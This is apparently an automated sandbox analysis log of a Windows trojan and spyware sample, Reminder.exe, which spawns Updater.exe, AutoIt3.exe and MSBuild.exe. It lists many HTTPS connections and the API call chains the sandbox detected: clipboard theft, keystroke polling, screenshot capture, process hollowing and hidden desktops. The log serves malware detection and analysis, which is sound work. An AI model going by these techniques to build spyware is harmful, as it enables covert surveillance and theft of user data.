                      Source: unknownNetwork traffic detected: HTTP traffic on port 57900 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57779
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57776
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57897
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57775
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57896
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57778
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57899
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57777
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57898
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57782
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57728 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57785
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57784
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57946 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57781
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57780
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57854 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57911 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57787
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57786
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57789
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57888 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57788
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57727 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57794
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57793
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57796
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57790
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57807 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57832 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57855 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57945 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57792
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57968 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57791
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57769 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57912 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57818 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57923 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57866 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57798
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57797
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57792 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57799
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57750 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57993 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57877 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57934 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57781 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57821 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57729
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57728
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57849
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57725
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57770 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57924 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57967
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57724
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57845
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57966
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57727
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57848
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57969
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57726
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57847
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57968
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57721
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57842
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57720
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57841
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57962
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57793 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57844
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57965
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57722
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57843
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57901 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57964
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57970
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57730
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57851
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57972
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57850
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57971
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57809 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57841 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57853 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57876 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57761 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57899 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57738 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57739
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57857
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57978
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57735
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57830 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57856
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57977
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57738
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57859
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57864 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57737
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57858
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57732
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57853
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57974
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57731
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57852
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57973
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57734
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57855
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57976
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57733
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57854
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57975
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57860
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57981
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57980
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57741
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57983
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57740
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57861
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57982
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57970 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57991 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57749 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57980 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57737 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57842 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57747
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57865 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57868
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57989
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57746
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57867
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57988
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57749
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57748
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57743
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57864
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57985
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57742
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57863
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57984
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57745
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57866
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57987
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57744
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57865
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57986
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57750
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57871
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57992
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57870
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57991
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57752
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57873
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57872
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57993
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57990
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57782 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57935 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57715 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57820 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57958 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57758
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57879
                      Source: unknownHTTPS traffic detected: 13.107.246.51:443 -> 192.168.2.4:57712 version: TLS 1.2
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_0074F664 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,35_2_0074F664
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_0074F8D3 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,35_2_0074F8D3
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00CEF8D3 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,38_2_00CEF8D3
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_0074F664 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,35_2_0074F664
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 41_2_004064C0 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegQueryInfoKeyW,RegEnumValueA,RegCloseKey,GdiplusStartup,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown,GetUserNameA,LookupAccountNameA,GetSidIdentifierAuthority,GetSidSubAuthorityCount,GetSidSubAuthority,GetSidSubAuthority,41_2_004064C0
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_0073AA95 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,35_2_0073AA95
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_00769FB4 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,35_2_00769FB4
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00D09FB4 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,38_2_00D09FB4
                      Source: Yara matchFile source: Process Memory Space: Updater.exe PID: 1612, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: AutoIt3.exe PID: 2536, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: AutoIt3.exe PID: 3272, type: MEMORYSTR
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_014B5BC9 CreateDesktopA,CreateProcessA,CreateProcessA,CreateProcessA,CreateProcessA,WaitForSingleObject,35_2_014B5BC9
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_014B9051 GetCurrentProcessId,CreateProcessA,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,ResumeThread,Sleep,GetTickCount,35_2_014B9051
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_016688E9 GetCurrentProcessId,CreateProcessA,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,ResumeThread,Sleep,GetTickCount,38_2_016688E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 41_2_00429C1A NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,41_2_00429C1A
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_0073E3CB: CreateFileW,DeviceIoControl,CloseHandle,35_2_0073E3CB
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_0073230F LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,35_2_0073230F
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_0073F76E ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,35_2_0073F76E
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00CDF76E ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,38_2_00CDF76E
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_006D707035_2_006D7070
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_006E3AD935_2_006E3AD9
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_0070E32F35_2_0070E32F
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_006F24CA35_2_006F24CA
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_0070659935_2_00706599
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_0075C84435_2_0075C844
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_006F29E335_2_006F29E3
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_006FC9C035_2_006FC9C0
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_006ECBF035_2_006ECBF0
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_00706C0935_2_00706C09
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_00742D8135_2_00742D81
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_006DCE2035_2_006DCE20
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_006DEE0035_2_006DEE00
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_006F2F2335_2_006F2F23
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_006EF0DA35_2_006EF0DA
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_0073916835_2_00739168
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_0076525A35_2_0076525A
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_006ED37F35_2_006ED37F
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_006F774635_2_006F7746
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_006F196435_2_006F1964
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_006F797535_2_006F7975
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_006F7BD235_2_006F7BD2
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_006DDC7035_2_006DDC70
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_00709D1E35_2_00709D1E
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_006F1FC135_2_006F1FC1
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_014B89A935_2_014B89A9
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_014B89A235_2_014B89A2
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00C7707038_2_00C77070
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00C83AD938_2_00C83AD9
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00CAE32F38_2_00CAE32F
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00C924CA38_2_00C924CA
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00CA659938_2_00CA6599
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00CFC84438_2_00CFC844
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00C9C9C038_2_00C9C9C0
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00C929E338_2_00C929E3
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00C8CBF038_2_00C8CBF0
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00CA6C0938_2_00CA6C09
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00CE2D8138_2_00CE2D81
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00C7EE0038_2_00C7EE00
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00C7CE2038_2_00C7CE20
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00C92F2338_2_00C92F23
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00C8F0DA38_2_00C8F0DA
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00CD916838_2_00CD9168
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00D0525A38_2_00D0525A
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00C8D37F38_2_00C8D37F
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00C9774638_2_00C97746
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00C9196438_2_00C91964
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00C9797538_2_00C97975
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00C97BD238_2_00C97BD2
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00C7DC7038_2_00C7DC70
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00CA9D1E38_2_00CA9D1E
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00C91FC138_2_00C91FC1
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_0166824138_2_01668241
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_0166823A38_2_0166823A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 41_2_0040B65041_2_0040B650
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 41_2_004051D041_2_004051D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 41_2_004531E241_2_004531E2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 41_2_0044623A41_2_0044623A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 41_2_0042E2C541_2_0042E2C5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 41_2_004312A341_2_004312A3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 41_2_0045C47641_2_0045C476
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 41_2_004064C041_2_004064C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 41_2_0040548041_2_00405480
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 41_2_0045C59641_2_0045C596
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 41_2_0043364441_2_00433644
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 41_2_0040573041_2_00405730
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 41_2_0044978041_2_00449780
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 41_2_0045396941_2_00453969
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 41_2_0045A9D841_2_0045A9D8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 41_2_0042EAB441_2_0042EAB4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 41_2_00441C9041_2_00441C90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 41_2_00441D3D41_2_00441D3D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 0042B460 appears 54 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 0042AD72 appears 68 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 00424030 appears 131 times
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: String function: 006F488E appears 34 times
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: String function: 006F1000 appears 41 times
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: String function: 006F014F appears 40 times
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: String function: 006DFA3B appears 33 times
                      Source: C:\edgheaa\AutoIt3.exeCode function: String function: 00C7FA3B appears 33 times
                      Source: C:\edgheaa\AutoIt3.exeCode function: String function: 00C9488E appears 34 times
                      Source: C:\edgheaa\AutoIt3.exeCode function: String function: 00C91000 appears 41 times
                      Source: C:\edgheaa\AutoIt3.exeCode function: String function: 00C9014F appears 40 times
                      Source: Reminder.exeStatic PE information: invalid certificate
                      Source: Reminder.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                      Source: Reminder.tmp.2.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                      Source: Reminder.exeStatic PE information: Number of sections : 11 > 10
                      Source: Reminder.tmp.0.drStatic PE information: Number of sections : 11 > 10
                      Source: Reminder.tmp.2.drStatic PE information: Number of sections : 11 > 10
                      Source: Reminder.exe, 00000000.00000003.1680434117.000000000308E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs Reminder.exe
                      Source: Reminder.exe, 00000000.00000000.1678861774.0000000000919000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs Reminder.exe
                      Source: Reminder.exe, 00000000.00000003.1680920376.000000007F5BA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs Reminder.exe
                      Source: Reminder.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: classification engineClassification label: mal92.troj.spyw.evad.winEXE@73/16@0/2
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_00744573 GetLastError,FormatMessageW,35_2_00744573
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_007321C9 AdjustTokenPrivileges,CloseHandle,35_2_007321C9
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_007327D9 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,35_2_007327D9
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00CD21C9 AdjustTokenPrivileges,CloseHandle,38_2_00CD21C9
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00CD27D9 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,38_2_00CD27D9
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_00745D7E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,35_2_00745D7E
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_0073E2AB CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CompareStringW,CloseHandle,35_2_0073E2AB
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_00738056 CoCreateInstance,SetErrorMode,GetProcAddress,SetErrorMode,35_2_00738056
